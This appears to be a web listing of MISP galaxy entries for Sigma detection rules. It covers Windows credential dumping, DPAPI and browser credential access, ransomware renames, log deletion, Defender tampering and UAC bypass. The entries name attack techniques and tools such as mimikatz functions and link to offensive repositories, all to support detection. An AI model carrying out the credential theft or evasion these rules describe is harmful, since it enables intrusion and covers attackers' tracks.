- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_exfil_tools.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-03-11 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_ntds_exfil_tools.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1003.003'] |
Related clusters
To see the related clusters, click here.
Potential SAM Database Dump
Detects the creation of files that look like exports of the local SAM (Security Account Manager) database.
Internal MISP references
UUID 4e87b8e2-2ee9-4b2a-a715-4727d297ece0 which can be used as unique global reference for Potential SAM Database Dump in MISP communities and other software using the MISP galaxy
External references
- https://github.com/FireFart/hivenightmare - webarchive
- https://www.google.com/search?q=%22reg.exe+save%22+sam - webarchive
- https://github.com/HuskyHacks/ShadowSteal - webarchive
- https://web.archive.org/web/20210725081645/https://github.com/cube0x0/CVE-2021-36934 - webarchive
- https://github.com/search?q=CVE-2021-36934 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sam_dump.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-02-11 |
| falsepositive | ['Rare cases of administrative activity'] |
| filename | file_event_win_sam_dump.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1003.002'] |
Related clusters
To see the related clusters, click here.
Suspicious Appended Extension
Detects file renames where the target filename uses an uncommon double extension. Could indicate potential ransomware activity renaming files and adding a custom extension to the encrypted files, such as ".jpg.crypted", ".docx.locky", etc.
Internal MISP references
UUID e3f673b3-65d1-4d80-9146-466f8b63fa99 which can be used as unique global reference for Suspicious Appended Extension in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-07-16 |
| falsepositive | ['Backup software'] |
| filename | file_rename_win_ransomware.yml |
| level | medium |
| logsource.category | file_rename |
| logsource.product | windows |
| tags | ['attack.impact', 'attack.t1486'] |
Related clusters
To see the related clusters, click here.
Access To Windows DPAPI Master Keys By Uncommon Applications
Detects file access requests to the Windows Data Protection API master keys by an uncommon application. This can be a sign of credential stealing. An example case would be usage of the mimikatz "dpapi::masterkey" function.
Internal MISP references
UUID 46612ae6-86be-4802-bc07-39b59feb1309 which can be used as unique global reference for Access To Windows DPAPI Master Keys By Uncommon Applications in MISP communities and other software using the MISP galaxy
External references
- http://blog.harmj0y.net/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/ - webarchive
- https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_susp_dpapi_master_key_access.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-10-17 |
| falsepositive | ['Unknown'] |
| filename | file_access_win_susp_dpapi_master_key_access.yml |
| level | medium |
| logsource.category | file_access |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1555.004'] |
Related clusters
To see the related clusters, click here.
Credential Manager Access By Uncommon Applications
Detects suspicious processes, based on name and location, that access the Windows Credential Manager and vault, which can be a sign of credential stealing. An example case would be usage of the mimikatz "dpapi::cred" function.
Internal MISP references
UUID 407aecb1-e762-4acf-8c7b-d087bcff3bb6 which can be used as unique global reference for Credential Manager Access By Uncommon Applications in MISP communities and other software using the MISP galaxy
External references
- https://hunter2.gitbook.io/darthsidious/privilege-escalation/mimikatz - webarchive
- https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_susp_credential_manager_access.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-10-11 |
| falsepositive | ['Legitimate software installed by the users for example in the "AppData" directory may access these files (for any reason).'] |
| filename | file_access_win_susp_credential_manager_access.yml |
| level | medium |
| logsource.category | file_access |
| logsource.product | windows |
| tags | ['attack.t1003', 'attack.credential-access'] |
Related clusters
To see the related clusters, click here.
Access To Potentially Sensitive Sysvol Files By Uncommon Applications
Detects file access requests to potentially sensitive files hosted on the Windows Sysvol share.
Internal MISP references
UUID d51694fe-484a-46ac-92d6-969e76d60d10 which can be used as unique global reference for Access To Potentially Sensitive Sysvol Files By Uncommon Applications in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2023-12-21 |
| falsepositive | ['Unknown'] |
| filename | file_access_win_susp_gpo_files.yml |
| level | medium |
| logsource.category | file_access |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1552.006'] |
Related clusters
To see the related clusters, click here.
Access To Crypto Currency Wallets By Uncommon Applications
Detects file access requests to cryptocurrency wallet files by uncommon processes. Could indicate an attempt to steal cryptocurrency wallets.
Internal MISP references
UUID f41b0311-44f9-44f0-816d-dd45e39d4bc8 which can be used as unique global reference for Access To Crypto Currency Wallets By Uncommon Applications in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | X__Junior (Nextron Systems) |
| creation_date | 2024-07-29 |
| falsepositive | ['Antivirus, Anti-Spyware, Anti-Malware Software', 'Backup software', 'Legitimate software installed on partitions other than "C:\"', 'Searching software such as "everything.exe"'] |
| filename | file_access_win_susp_crypto_currency_wallets.yml |
| level | medium |
| logsource.category | file_access |
| logsource.product | windows |
| tags | ['attack.t1003', 'attack.credential-access'] |
Related clusters
To see the related clusters, click here.
Microsoft Teams Sensitive File Access By Uncommon Applications
Detects file access attempts to sensitive Microsoft Teams files (leveldb, cookies) by an uncommon process.
Internal MISP references
UUID 65744385-8541-44a6-8630-ffc824d7d4cc which can be used as unique global reference for Microsoft Teams Sensitive File Access By Uncommon Applications in MISP communities and other software using the MISP galaxy
External references
- https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/ - webarchive
- https://www.vectra.ai/blog/undermining-microsoft-teams-security-by-mining-tokens - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_teams_sensitive_files.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | @SerkinValery |
| creation_date | 2024-07-22 |
| falsepositive | ['Unknown'] |
| filename | file_access_win_teams_sensitive_files.yml |
| level | medium |
| logsource.category | file_access |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1528'] |
Related clusters
To see the related clusters, click here.
Suspicious File Access to Browser Credential Storage
Detects file access to browser credential storage paths by non-browser processes, which may indicate credential access attempts. Adversaries may attempt to access browser credential storage to extract sensitive information such as usernames and passwords or cookies. This behavior is commonly observed in credential-stealing malware.
Internal MISP references
UUID a1dfd976-4852-41d4-9507-dc6590a3ccd0 which can be used as unique global reference for Suspicious File Access to Browser Credential Storage in MISP communities and other software using the MISP galaxy
External references
- https://fourcore.io/blogs/threat-hunting-browser-credential-stealing - webarchive
- https://github.com/splunk/security_content/blob/7283ba3723551f46b69dfeb23a63b358afb2cb0e/lookups/browser_app_list.csv?plain=1 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_susp_process_access_browser_cred_files.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113, X__Junior (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems), Parth-FourCore |
| creation_date | 2025-05-22 |
| falsepositive | ['Antivirus, Anti-Spyware, Anti-Malware Software', 'Legitimate software accessing browser data for synchronization or backup purposes.', 'Legitimate software installed on partitions other than "C:\"'] |
| filename | file_access_win_susp_process_access_browser_cred_files.yml |
| level | low |
| logsource.category | file_access |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1555.003', 'attack.discovery', 'attack.t1217'] |
Related clusters
To see the related clusters, click here.
Access To Windows Credential History File By Uncommon Applications
Detects file access requests to the Windows Credential History file by an uncommon application. This can be a sign of credential stealing. An example case would be usage of the mimikatz "dpapi::credhist" function.
Internal MISP references
UUID 7a2a22ea-a203-4cd3-9abf-20eb1c5c6cd2 which can be used as unique global reference for Access To Windows Credential History File By Uncommon Applications in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-10-17 |
| falsepositive | ['Unknown'] |
| filename | file_access_win_susp_credhist.yml |
| level | medium |
| logsource.category | file_access |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1555.004'] |
Related clusters
To see the related clusters, click here.
File Creation Date Changed to Another Year
Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system. Note that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.
Internal MISP references
UUID 558eebe5-f2ba-4104-b339-36f7902bcc1a which can be used as unique global reference for File Creation Date Changed to Another Year in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113, Florian Roth (Nextron Systems) |
| creation_date | 2022-08-12 |
| falsepositive | ['Changes made to or by the local NTP service'] |
| filename | file_change_win_2022_timestomping.yml |
| level | high |
| logsource.category | file_change |
| logsource.product | windows |
| tags | ['attack.t1070.006', 'attack.defense-evasion'] |
Related clusters
To see the related clusters, click here.
Unusual File Modification by dns.exe
Detects an unexpected file being modified by dns.exe, which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed).
Internal MISP references
UUID 9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3 which can be used as unique global reference for Unusual File Modification by dns.exe in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Tim Rauch (Nextron Systems), Elastic (idea) |
| creation_date | 2022-09-27 |
| falsepositive | ['Unknown'] |
| filename | file_change_win_unusual_modification_by_dns_exe.yml |
| level | high |
| logsource.category | file_change |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.initial-access', 'attack.t1133'] |
Related clusters
To see the related clusters, click here.
Prefetch File Deleted
Detects the deletion of a prefetch file, which may indicate an attempt to destroy forensic evidence.
Internal MISP references
UUID 0a1f9d29-6465-4776-b091-7f43b26e4c89 which can be used as unique global reference for Prefetch File Deleted in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Cedric MAURUGEON |
| creation_date | 2021-09-29 |
| falsepositive | ['Unknown'] |
| filename | file_delete_win_delete_prefetch.yml |
| level | high |
| logsource.category | file_delete |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1070.004'] |
Related clusters
To see the related clusters, click here.
Backup Files Deleted
Detects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.
Internal MISP references
UUID 06125661-3814-4e03-bfa2-1e4411c60ac3 which can be used as unique global reference for Backup Files Deleted in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-6---windows---delete-backup-files - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_backup_file.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-01-02 |
| falsepositive | ['Legitimate usage'] |
| filename | file_delete_win_delete_backup_file.yml |
| level | medium |
| logsource.category | file_delete |
| logsource.product | windows |
| tags | ['attack.impact', 'attack.t1490'] |
Related clusters
To see the related clusters, click here.
Unusual File Deletion by Dns.exe
Detects an unexpected file being deleted by dns.exe, which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed).
Internal MISP references
UUID 8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0 which can be used as unique global reference for Unusual File Deletion by Dns.exe in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Tim Rauch (Nextron Systems), Elastic (idea) |
| creation_date | 2022-09-27 |
| falsepositive | ['Unknown'] |
| filename | file_delete_win_unusual_deletion_by_dns_exe.yml |
| level | high |
| logsource.category | file_delete |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.initial-access', 'attack.t1133'] |
Related clusters
To see the related clusters, click here.
Process Deletion of Its Own Executable
Detects the deletion of a process's executable by itself. This is usually not possible without workarounds and may be used by malware to hide its traces.
Internal MISP references
UUID f01d1f70-cd41-42ec-9c0b-26dd9c22bf29 which can be used as unique global reference for Process Deletion of Its Own Executable in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Max Altgelt (Nextron Systems) |
| creation_date | 2024-09-03 |
| falsepositive | ['Some false positives are to be expected from uninstallers.'] |
| filename | file_delete_win_delete_own_image.yml |
| level | medium |
| logsource.category | file_delete |
| logsource.product | windows |
| tags | ['attack.defense-evasion'] |
IIS WebServer Access Logs Deleted
Detects the deletion of IIS web server access logs, which may indicate an attempt to destroy forensic evidence.
Internal MISP references
UUID 3eb8c339-a765-48cc-a150-4364c04652bf which can be used as unique global reference for IIS WebServer Access Logs Deleted in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-09-16 |
| falsepositive | ['During uninstallation of the IIS service', 'During log rotation'] |
| filename | file_delete_win_delete_iis_access_logs.yml |
| level | medium |
| logsource.category | file_delete |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1070'] |
Related clusters
To see the related clusters, click here.
ADS Zone.Identifier Deleted By Uncommon Application
Detects the deletion of the "Zone.Identifier" ADS by an uncommon process. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps.
Internal MISP references
UUID 3109530e-ab47-4cc6-a953-cac5ebcc93ae which can be used as unique global reference for ADS Zone.Identifier Deleted By Uncommon Application in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-09-04 |
| falsepositive | ['Other third party applications not listed.'] |
| filename | file_delete_win_zone_identifier_ads_uncommon.yml |
| level | medium |
| logsource.category | file_delete |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1070.004'] |
Related clusters
To see the related clusters, click here.
Exchange PowerShell Cmdlet History Deleted
Detects the deletion of the Exchange PowerShell cmdlet history logs, which may indicate an attempt to destroy forensic evidence.
Internal MISP references
UUID a55349d8-9588-4c5a-8e3b-1925fe2a4ffe which can be used as unique global reference for Exchange PowerShell Cmdlet History Deleted in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-10-26 |
| falsepositive | ['Possible FP during log rotation'] |
| filename | file_delete_win_delete_exchange_powershell_logs.yml |
| level | high |
| logsource.category | file_delete |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1070'] |
Related clusters
To see the related clusters, click here.
TeamViewer Log File Deleted
Detects the deletion of the TeamViewer log files, which may indicate an attempt to destroy forensic evidence.
Internal MISP references
UUID b1decb61-ed83-4339-8e95-53ea51901720 which can be used as unique global reference for TeamViewer Log File Deleted in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-01-16 |
| falsepositive | ['Unknown'] |
| filename | file_delete_win_delete_teamviewer_logs.yml |
| level | low |
| logsource.category | file_delete |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1070.004'] |
Related clusters
To see the related clusters, click here.
EventLog EVTX File Deleted
Detects the deletion of the event log files, which may indicate an attempt to destroy forensic evidence.
Internal MISP references
UUID 63c779ba-f638-40a0-a593-ddd45e8b1ddc which can be used as unique global reference for EventLog EVTX File Deleted in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-02-15 |
| falsepositive | ['Unknown'] |
| filename | file_delete_win_delete_event_log_files.yml |
| level | medium |
| logsource.category | file_delete |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1070'] |
Related clusters
To see the related clusters, click here.
Tomcat WebServer Logs Deleted
Detects the deletion of Tomcat web server logs, which may indicate an attempt to destroy forensic evidence.
Internal MISP references
UUID 270185ff-5f50-4d6d-a27f-24c3b8c9fef8 which can be used as unique global reference for Tomcat WebServer Logs Deleted in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-02-16 |
| falsepositive | ['During uninstallation of the tomcat server', 'During log rotation'] |
| filename | file_delete_win_delete_tomcat_logs.yml |
| level | medium |
| logsource.category | file_delete |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1070'] |
Related clusters
To see the related clusters, click here.
File Deleted Via Sysinternals SDelete
Detects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern used to rename files.
Internal MISP references
UUID 6ddab845-b1b8-49c2-bbf7-1a11967f64bc which can be used as unique global reference for File Deleted Via Sysinternals SDelete in MISP communities and other software using the MISP galaxy
External references
- https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/4.B.4_83D62033-105A-4A02-8B75-DAB52D8D51EC.md - webarchive
- https://github.com/OTRF/detection-hackathon-apt29/issues/9 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) |
| creation_date | 2020-05-02 |
| falsepositive | ['Legitimate usage'] |
| filename | file_delete_win_sysinternals_sdelete_file_deletion.yml |
| level | medium |
| logsource.category | file_delete |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1070.004'] |
Related clusters
To see the related clusters, click here.
PowerShell Console History Logs Deleted
Detects the deletion of the PowerShell console history logs, which may indicate an attempt to destroy forensic evidence.
Internal MISP references
UUID ff301988-c231-4bd0-834c-ac9d73b86586 which can be used as unique global reference for PowerShell Console History Logs Deleted in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-02-15 |
| falsepositive | ['Unknown'] |
| filename | file_delete_win_delete_powershell_command_history.yml |
| level | medium |
| logsource.category | file_delete |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1070'] |
Related clusters
To see the related clusters, click here.
Potentially Suspicious Self Extraction Directive File Created
Detects the creation of a binary file with the ".sed" extension. The ".sed" extension stands for Self Extraction Directive files. These files are used by the "iexpress.exe" utility in order to create self-extracting packages. Attackers have been seen abusing this utility and creating PE files with embedded ".sed" entries. Usually ".sed" files are simple INI files and not PE binaries.
Internal MISP references
UUID ab90dab8-c7da-4010-9193-563528cfa347 which can be used as unique global reference for Potentially Suspicious Self Extraction Directive File Created in MISP communities and other software using the MISP galaxy
External references
- https://strontic.github.io/xcyclopedia/library/iexpress.exe-D594B2A33EFAFD0EABF09E3FDC05FCEA.html - webarchive
- https://en.wikipedia.org/wiki/IExpress - webarchive
- https://www.virustotal.com/gui/file/602f4ae507fa8de57ada079adff25a6c2a899bd25cd092d0af7e62cdb619c93c/behavior - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_executable_detected/file_executable_detected_win_susp_embeded_sed_file.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Joseliyo Sanchez, @Joseliyo_Jstnk |
| creation_date | 2024-02-05 |
| falsepositive | ['Unknown'] |
| filename | file_executable_detected_win_susp_embeded_sed_file.yml |
| level | medium |
| logsource.category | file_executable_detected |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1218'] |
Related clusters
To see the related clusters, click here.
DLL Execution Via Register-cimprovider.exe
Detects the use of register-cimprovider.exe to execute an arbitrary DLL file.
Internal MISP references
UUID a2910908-e86f-4687-aeba-76a5f996e652 which can be used as unique global reference for DLL Execution Via Register-cimprovider.exe in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Ivan Dyachkov, Yulia Fomina, oscd.community |
| creation_date | 2020-10-07 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_registry_cimprovider_dll_load.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.defense-evasion', 'attack.t1574'] |
Related clusters
To see the related clusters, click here.
Windows Kernel Debugger Execution
Detects execution of the Windows Kernel Debugger "kd.exe".
Internal MISP references
UUID 27ee9438-90dc-4bef-904b-d3ef927f5e7e which can be used as unique global reference for Windows Kernel Debugger Execution in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-05-15 |
| falsepositive | ['Rare occasions of legitimate cases where kernel debugging is necessary in production. Investigation is required'] |
| filename | proc_creation_win_kd_execution.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.privilege-escalation'] |
Windows Internet Hosted WebDav Share Mount Via Net.EXE
Detects when an internet-hosted WebDAV share is mounted using the "net.exe" utility.
Internal MISP references
UUID 7e6237fe-3ddb-438f-9381-9bf9de5af8d0 which can be used as unique global reference for Windows Internet Hosted WebDav Share Mount Via Net.EXE in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-02-21 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_net_use_mount_internet_share.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.lateral-movement', 'attack.t1021.002'] |
Related clusters
To see the related clusters, click here.
Uninstall Crowdstrike Falcon Sensor
Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling the Crowdstrike Falcon sensor.
Internal MISP references
UUID f0f7be61-9cf5-43be-9836-99d6ef448a18 which can be used as unique global reference for Uninstall Crowdstrike Falcon Sensor in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2021-07-12 |
| falsepositive | ['Administrator might leverage the same command line for debugging or other purposes. However this action must be always investigated'] |
| filename | proc_creation_win_uninstall_crowdstrike_falcon.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1562.001'] |
Related clusters
To see the related clusters, click here.
Powershell Defender Disable Scan Feature
Detects requests to disable Microsoft Defender features using PowerShell commands
Internal MISP references
UUID 1ec65a5f-9473-4f12-97da-622044d6df21 which can be used as unique global reference for Powershell Defender Disable Scan Feature in MISP communities and other software using the MISP galaxy
External references
- https://www.virustotal.com/gui/file/d609799091731d83d75ec5d1f030571af20c45efeeb94840b67ea09a3283ab65/behavior/C2AE - webarchive
- https://learn.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps - webarchive
- https://www.virustotal.com/gui/search/content%253A%2522Set-MpPreference%2520-Disable%2522/files - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_disable_feature.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-03-03 |
| falsepositive | ['Possible administrative activity', 'Other Cmdlets that may use the same parameters'] |
| filename | proc_creation_win_powershell_defender_disable_feature.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1562.001'] |
Related clusters
To see the related clusters, click here.
UAC Bypass Using ChangePK and SLUI
Detects a UAC bypass that uses changepk.exe and slui.exe (UACMe 61).
Internal MISP references
UUID 503d581c-7df0-4bbe-b9be-5840c0ecc1fc which can be used as unique global reference for UAC Bypass Using ChangePK and SLUI in MISP communities and other software using the MISP galaxy
External references
- https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf - webarchive
- https://github.com/hfiref0x/UACME - webarchive
- https://mattharr0ey.medium.com/privilege-escalation-uac-bypass-in-changepk-c40b92818d1b - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Christian Burkard (Nextron Systems) |
| creation_date | 2021-08-23 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_uac_bypass_changepk_slui.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1548.002'] |
Related clusters
To see the related clusters, click here.
UtilityFunctions.ps1 Proxy Dll
Detects the use of a Microsoft signed script executing a managed DLL with PowerShell.
Internal MISP references
UUID 0403d67d-6227-4ea8-8145-4e72db7da120 which can be used as unique global reference for UtilityFunctions.ps1 Proxy Dll in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-05-28 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_lolbin_utilityfunctions.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1216'] |
Related clusters
To see the related clusters, click here.
Process Creation Using Sysnative Folder
Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)
Internal MISP references
UUID 3c1b5fb0-c72f-45ba-abd1-4d4c353144ab which can be used as unique global reference for Process Creation Using Sysnative Folder in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Max Altgelt (Nextron Systems) |
| creation_date | 2022-08-23 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_susp_sysnative.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1055'] |
Related clusters
To see the related clusters, click here.
New Generic Credentials Added Via Cmdkey.EXE
Detects usage of "cmdkey.exe" to add generic credentials. As an example, this can be used before connecting to an RDP session via command line interface.
Internal MISP references
UUID b1ec66c6-f4d1-4b5c-96dd-af28ccae7727 which can be used as unique global reference for New Generic Credentials Added Via Cmdkey.EXE in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113, Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-02-03 |
| falsepositive | ['Legitimate usage for administration purposes'] |
| filename | proc_creation_win_cmdkey_adding_generic_creds.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1003.005'] |
Related clusters
To see the related clusters, click here.
Sysmon Driver Unloaded Via Fltmc.EXE
Detects a possible unload of the Sysmon filter driver via fltmc.exe.
Internal MISP references
UUID 4d7cda18-1b12-4e52-b45c-d28653210df8 which can be used as unique global reference for Sysmon Driver Unloaded Via Fltmc.EXE in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Kirill Kiryanov, oscd.community |
| creation_date | 2019-10-23 |
| falsepositive | ['Unlikely'] |
| filename | proc_creation_win_fltmc_unload_driver_sysmon.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1070', 'attack.t1562', 'attack.t1562.002'] |
Related clusters
To see the related clusters, click here.
Suspicious Greedy Compression Using Rar.EXE
Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes
Internal MISP references
UUID afe52666-401e-4a02-b4ff-5d128990b8cb which can be used as unique global reference for Suspicious Greedy Compression Using Rar.EXE in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | X__Junior (Nextron Systems), Florian Roth (Nextron Systems) |
| creation_date | 2022-12-15 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_rar_susp_greedy_compression.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1059'] |
Related clusters
To see the related clusters, click here.
PUA - Wsudo Suspicious Execution
Detects usage of wsudo (Windows Sudo Utility), a tool that lets the user execute programs with different permissions (System, Trusted Installer, Administrator, etc.).
Internal MISP references
UUID bdeeabc9-ff2a-4a51-be59-bb253aac7891 which can be used as unique global reference for PUA - Wsudo Suspicious Execution in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-12-02 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_pua_wsudo_susp_execution.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.privilege-escalation', 'attack.t1059'] |
Related clusters
